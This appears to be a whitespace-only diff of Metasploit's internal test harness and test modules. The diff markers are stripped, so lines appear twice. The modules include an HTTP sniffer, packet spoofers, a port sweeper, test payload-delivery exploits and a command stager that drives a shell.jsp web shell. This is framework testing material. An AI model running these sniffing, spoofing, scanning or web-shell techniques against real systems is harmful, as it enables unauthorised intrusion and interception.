def it(msg="", &block)
@tests += 1
begin
result = block.call
unless result
print_error("FAILED: #{msg}")
print_error("FAILED: #{error}") if error
@failures += 1
return
end
rescue ::Exception => e
print_error("FAILED: #{msg}")
print_error("Exception: #{e.class} : #{e}")
dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return
end
print_good("#{msg}")
end
print_good("#{msg}")
end
def pending(msg="", &block)
print_status("PENDING: #{msg}")
end
def pending(msg="", &block)
print_status("PENDING: #{msg}")
end
end
module ModuleTest::PostTest
include ModuleTest
def run
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
include ModuleTest
def run
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
t = Time.now
@tests = 0; @failures = 0
run_all_tests
t = Time.now
@tests = 0; @failures = 0
run_all_tests
vprint_status("Testing complete in #{Time.now - t}")
if (@failures > 0)
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
end
end
vprint_status("Testing complete in #{Time.now - t}")
if (@failures > 0)
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
end
end
end
end
+67 -67
@@ -5,90 +5,90 @@ module MsfTest
module MsfMatchers
class ContainACompleteTest
class ContainACompleteTest
def initialize()
@r = Regexr.new(true)
end
def initialize()
@r = Regexr.new(true)
end
def matches?(data)
@data = data
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
end
def matches?(data)
@data = data
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
end
def failure_message
"Beginning or end was incorrect."
end
def failure_message
"Beginning or end was incorrect."
end
def negative_failure_message
"Expected to find a no beginning or end, but it matched."
end
def negative_failure_message
"Expected to find a no beginning or end, but it matched."
end
end
def contain_a_complete_test
ContainACompleteTest.new
end
end
def contain_a_complete_test
ContainACompleteTest.new
end
class ContainAllSuccesses
class ContainAllSuccesses
def initialize(successes=[])
@successes = successes
@r = Regexr.new(true)
end
def initialize(successes=[])
@successes = successes
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
return true if !@string
nil
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
return true if !@string
nil
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
#alias :have_all_successes :contain_all_successes
end
def contain_all_successes(successes=[])
ContainAllSuccesses.new(successes)
end
class ContainNoFailuresExcept
#alias :have_all_successes :contain_all_successes
end
def contain_all_successes(successes=[])
ContainAllSuccesses.new(successes)
end
class ContainNoFailuresExcept
def initialize(failures=[],exceptions=[])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def initialize(failures=[],exceptions=[])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
return true if !@string
nil
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
return true if !@string
nil
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
#alias :have_no_failures :contain_no_failures
end
#alias :have_no_failures :contain_no_failures
end
def contain_no_failures_except(failures=[],exceptions=[])
ContainNoFailuresExcept.new(failures,exceptions)
end
def contain_no_failures_except(failures=[],exceptions=[])
ContainNoFailuresExcept.new(failures,exceptions)
end
end
end
+83 -83
@@ -6,101 +6,101 @@
class Regexr
def initialize(verbose=false, case_insensitive=true)
@verbose = verbose
@case_insensitive = case_insensitive
end
def initialize(verbose=false, case_insensitive=true)
@verbose = verbose
@case_insensitive = case_insensitive
end
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
def verify_start_and_end(data,the_start,the_end)
return false unless data
data_lines = data.split("\n")
regex_start = Regexp.new(the_start, @case_insensitive)
regex_end = Regexp.new(the_end, @case_insensitive)
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
def verify_start_and_end(data,the_start,the_end)
return false unless data
data_lines = data.split("\n")
regex_start = Regexp.new(the_start, @case_insensitive)
regex_end = Regexp.new(the_end, @case_insensitive)
if regex_start =~ data_lines.first
return regex_end =~ data_lines.last
end
return false
end
if regex_start =~ data_lines.first
return regex_end =~ data_lines.last
end
return false
end
# Scan for any number of success lines. In order to pass, all successes must match.
def find_strings_that_dont_exist_in_data(data,regexes=[])
return false unless data
# Scan for any number of success lines. In order to pass, all successes must match.
def find_strings_that_dont_exist_in_data(data,regexes=[])
return false unless data
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
if regexes
target_successes = regexes.size
success_count = 0
regexes.each { |condition|
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
if regexes
target_successes = regexes.size
success_count = 0
regexes.each { |condition|
## assume we haven't got it
found = false
re = Regexp.new(condition, @case_insensitive)
## for each of our data lines
data_lines.each {|line|
## if it's a match
if line =~ re
found = true
break ## success!
end
}
if !found
return condition ## return this string, it wasn't found.
end
}
end
nil ## got all successes, woot!
end
## assume we haven't got it
found = false
re = Regexp.new(condition, @case_insensitive)
## for each of our data lines
data_lines.each {|line|
## if it's a match
if line =~ re
found = true
break ## success!
end
}
if !found
return condition ## return this string, it wasn't found.
end
}
end
nil ## got all successes, woot!
end
# Scan for failures -- if any single failure matches, the test returns true.
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[])
# Scan for failures -- if any single failure matches, the test returns true.
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[])
return false unless data
return false unless data
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
regexes.each { |condition|
regexes.each { |condition|
## for each failure condition that we've been passed
re = Regexp.new(condition, @case_insensitive)
## for each failure condition that we've been passed
re = Regexp.new(condition, @case_insensitive)
## assume we're okay
found = false
## assume we're okay
found = false
data_lines.each { |line|
if re =~ line
found = true # oh, we found a match
# but let's check the exceptions
exceptions.map { |exception|
reg_exception = Regexp.new(exception, @case_insensitive)
data_lines.each { |line|
if re =~ line
found = true # oh, we found a match
# but let's check the exceptions
exceptions.map { |exception|
reg_exception = Regexp.new(exception, @case_insensitive)
# If the exception matches here, we'll spare it
if reg_exception =~ line
found = false
break
end
}
# If the exception matches here, we'll spare it
if reg_exception =~ line
found = false
break
end
}
# If we didn't find an exception, we have to fail it. do not pass go.
return condition if found
end
}
}
nil ## no failures found!
end
# If we didn't find an exception, we have to fail it. do not pass go.
return condition if found
end
}
}
nil ## no failures found!
end
end
+38 -38
@@ -15,49 +15,49 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'Simple Network Capture Tester',
'Version' => '$Revision$',
'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Sniffer' ]
],
'PassiveActions' =>
[
'Sniffer'
],
'DefaultAction' => 'Sniffer'
)
def initialize
super(
'Name' => 'Simple Network Capture Tester',
'Version' => '$Revision$',
'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Sniffer' ]
],
'PassiveActions' =>
[
'Sniffer'
],
'DefaultAction' => 'Sniffer'
)
deregister_options('RHOST')
end
deregister_options('RHOST')
end
def run
print_status("Opening the network interface...")
open_pcap()
def run
print_status("Opening the network interface...")
open_pcap()
print_status("Sniffing HTTP requests...")
each_packet() do |pkt|
p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp?
next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1
print_status("GET #{url}")
break if url =~ /StopCapture/
end
print_status("Sniffing HTTP requests...")
each_packet() do |pkt|
p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp?
next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1
print_status("GET #{url}")
break if url =~ /StopCapture/
end
end
close_pcap()
print_status("Finished sniffing")
end
end
close_pcap()
print_status("Finished sniffing")
end
end
+30 -30
@@ -9,39 +9,39 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def run
print_debug "Run is successful."
end
def run
print_debug "Run is successful."
end
end
+34 -34
@@ -15,43 +15,43 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'Simple Ethernet Frame Spoofer',
'Version' => '$Revision$',
'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Spoofer' ]
],
'DefaultAction' => 'Spoofer'
)
end
def initialize
super(
'Name' => 'Simple Ethernet Frame Spoofer',
'Version' => '$Revision$',
'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Spoofer' ]
],
'DefaultAction' => 'Spoofer'
)
end
def run
print_status("Opening the network interface...")
open_pcap()
def run
print_status("Opening the network interface...")
open_pcap()
p = PacketFu::UDPPacket.new
p.eth_saddr = "00:41:41:41:41:41"
p.eth_daddr = "00:42:42:42:42:42"
p.ip_saddr = "41.41.41.41"
p.ip_daddr = "42.42.42.42"
p.udp_sport = 0x41
p.udp_dport = 0x42
p.payload = "SPOOOOOFED"
p.recalc
1.upto(10) do
capture.inject(p.to_s)
end
p = PacketFu::UDPPacket.new
p.eth_saddr = "00:41:41:41:41:41"
p.eth_daddr = "00:42:42:42:42:42"
p.ip_saddr = "41.41.41.41"
p.ip_daddr = "42.42.42.42"
p.udp_sport = 0x41
p.udp_dport = 0x42
p.payload = "SPOOOOOFED"
p.recalc
1.upto(10) do
capture.inject(p.to_s)
end
close_pcap()
print_status("Finished sending")
end
close_pcap()
print_status("Finished sending")
end
end
+60 -60
@@ -13,82 +13,82 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Ftp
def initialize
super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Version' => '$Revision$',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Version' => '$Revision$',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
]
)
end
register_options(
[
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
]
)
end
def run
def run
begin
if (not connect_login)
return
end
begin
if (not connect_login)
return
end
curdir = ""
curdir = ""
# change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
print_status("CWD response: #{result.inspect}")
# change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
print_status("CWD response: #{result.inspect}")
# find out what the server thinks this dir is
result = send_cmd( ["PWD"], true )
print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/)
curdir = $1
end
curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/"
# find out what the server thinks this dir is
result = send_cmd( ["PWD"], true )
print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/)
curdir = $1
end
curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/"
# generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
# generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
# test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
print_status("PUT response: #{result.inspect}")
# test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
print_status("PUT response: #{result.inspect}")
# test fallthrough
result = send_cmd_data(["HELP"], true)
print_status("HELP response: #{result.inspect}")
# test fallthrough
result = send_cmd_data(["HELP"], true)
print_status("HELP response: #{result.inspect}")
# test listing directory
result = send_cmd_data(["LS", curdir], "A")
print_status("LS response: #{result.inspect}")
# test listing directory
result = send_cmd_data(["LS", curdir], "A")
print_status("LS response: #{result.inspect}")
# test getting file
result = send_cmd_data(["GET", curdir+"test"], "A")
print_status("GET response: #{result[0].inspect}")
# test getting file
result = send_cmd_data(["GET", curdir+"test"], "A")
print_status("GET response: #{result[0].inspect}")
# see if it matches
if (result[1] != data)
print_error("Data doesn't match!")
else
print_good("Data downloaded matches what we uploaded!")
end
# see if it matches
if (result[1] != data)
print_error("Data doesn't match!")
else
print_good("Data downloaded matches what we uploaded!")
end
# adios
result = send_cmd( ["QUIT"], true )
print_status("QUIT response: #{result.inspect}")
# adios
result = send_cmd( ["QUIT"], true )
print_status("QUIT response: #{result.inspect}")
ensure
disconnect
end
ensure
disconnect
end
end
end
end
+44 -44
@@ -14,56 +14,56 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Scanner
include Msf::Exploit::Capture
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple IP Spoofing Tester',
'Version' => '$Revision$',
'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple IP Spoofing Tester',
'Version' => '$Revision$',
'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
begin
require 'pcaprub'
@@havepcap = true
rescue ::LoadError
@@havepcap = false
end
begin
require 'pcaprub'
@@havepcap = true
rescue ::LoadError
@@havepcap = false
end
deregister_options('FILTER','PCAPFILE')
deregister_options('FILTER','PCAPFILE')
end
end
def run_host(ip)
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = ip
p.ip_daddr = ip
p.ip_ttl = 255
p.udp_sport = 53
p.udp_dport = 53
p.payload = "HELLO WORLD"
p.recalc
ret = send(ip,p)
if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else
print_error("#{ip}: Packet not sent. Check permissions & interface.")
end
close_pcap
end
def run_host(ip)
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = ip
p.ip_daddr = ip
p.ip_ttl = 255
p.udp_sport = 53
p.udp_dport = 53
p.payload = "HELLO WORLD"
p.recalc
ret = send(ip,p)
if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else
print_error("#{ip}: Packet not sent. Check permissions & interface.")
end
close_pcap
end
def send(ip,pkt)
begin
capture_sendto(pkt, ip)
rescue RuntimeError => e
return :error
end
return :done
end
def send(ip,pkt)
begin
capture_sendto(pkt, ip)
rescue RuntimeError => e
return :error
end
return :done
end
end
+55 -55
@@ -15,66 +15,66 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
['Continuous Port Sweep']
],
'PassiveActions' =>
[
'Continuous Port Sweep'
]
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
['Continuous Port Sweep']
],
'PassiveActions' =>
[
'Continuous Port Sweep'
]
)
register_options(
[
Opt::RHOST,
Opt::RPORT,
], self.class)
register_options(
[
Opt::RHOST,
Opt::RPORT,
], self.class)
end
end
def run
print_status("Running the simple recon module with action #{action.name}")
def run
print_status("Running the simple recon module with action #{action.name}")
case action.name
when 'Continuous Port Sweep'
while (true)
1.upto(65535) do |port|
datastore['RPORT'] = port
prober()
end
end
end
end
case action.name
when 'Continuous Port Sweep'
while (true)
1.upto(65535) do |port|
datastore['RPORT'] = port
prober()
end
end
end
end
def prober
begin
connect
disconnect
report_host(:host => datastore['RHOST'])
report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => 'tcp'
)
rescue ::Exception => e
case e.to_s
when /connection was refused/
report_host(:host => datastore['RHOST'])
else
print_status(e.to_s)
end
end
end
def prober
begin
connect
disconnect
report_host(:host => datastore['RHOST'])
report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => 'tcp'
)
rescue ::Exception => e
case e.to_s
when /connection was refused/
report_host(:host => datastore['RHOST'])
else
print_status(e.to_s)
end
end
end
end
+20 -20
@@ -15,30 +15,30 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_batch_size
3
end
def run_batch_size
3
end
def run_batch(batch)
print_status("Working on batch #{batch.join(",")}")
end
def run_batch(batch)
print_status("Working on batch #{batch.join(",")}")
end
end
+17 -17
@@ -15,26 +15,26 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_host(ip)
print_status("Working on host #{ip}")
end
def run_host(ip)
print_status("Working on host #{ip}")
end
end
+19 -19
@@ -15,29 +15,29 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_range(range)
print_status("Working on range #{range}")
rw = Rex::Socket::RangeWalker.new(range)
print_status("RangeWalker: #{rw.inspect}")
end
def run_range(range)
print_status("Working on range #{range}")
rw = Rex::Socket::RangeWalker.new(range)
print_status("RangeWalker: #{rw.inspect}")
end
end
+6 -6
@@ -9,14 +9,14 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
+89 -89
@@ -12,106 +12,106 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
+29 -29
@@ -9,37 +9,37 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def exploit
print_debug "Exploit is successful."
end
def exploit
print_debug "Exploit is successful."
end
end
+59 -59
@@ -12,75 +12,75 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
def exploit
def exploit
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
execute_cmdstager(opts)
execute_cmdstager(opts)
handler
handler
end
end
end
+37 -37
@@ -12,46 +12,46 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Dialup
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect_dialup
handler
disconnect_dialup
end
def exploit
connect_dialup
handler
disconnect_dialup
end
end
+66 -66
@@ -12,87 +12,87 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
